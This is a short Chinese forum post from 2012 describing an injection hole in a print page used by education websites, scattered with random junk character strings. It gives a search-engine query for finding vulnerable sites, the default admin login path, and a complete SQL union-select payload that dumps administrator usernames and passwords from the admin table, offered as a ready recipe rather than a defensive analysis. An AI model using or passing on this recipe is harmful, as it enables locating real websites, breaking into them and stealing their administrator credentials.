教育站打印页面漏洞
/ j. V0 r6 R* N1 G百度或google搜索 inurl:info_Print.asp?ArticleID=& d% S2 [, I4 j- c+ a5 Q
默认后台:/ad_login.asp6 T# x5 u8 U$ U: p
爆管理员密码:
+ S: ^/ ?! ?1 f a在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可' G* W' A# ^7 b( E/ `" ^! ]0 w
+ X- ^* ~$ h: E; s2 E' t
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin5 C9 G W- k% w, a" U
5 x5 u) `6 X& C0 I: q' X4 Q4 i
作者:佚名 3 I w% a- t, C( E
( N! d9 V y" F/ {, B2 s- M9 X. Z! o
* T+ R7 j8 E$ y# N! ?1 q+ |
|
发表于 2012-10-31 08:37:31
收藏
支持
反对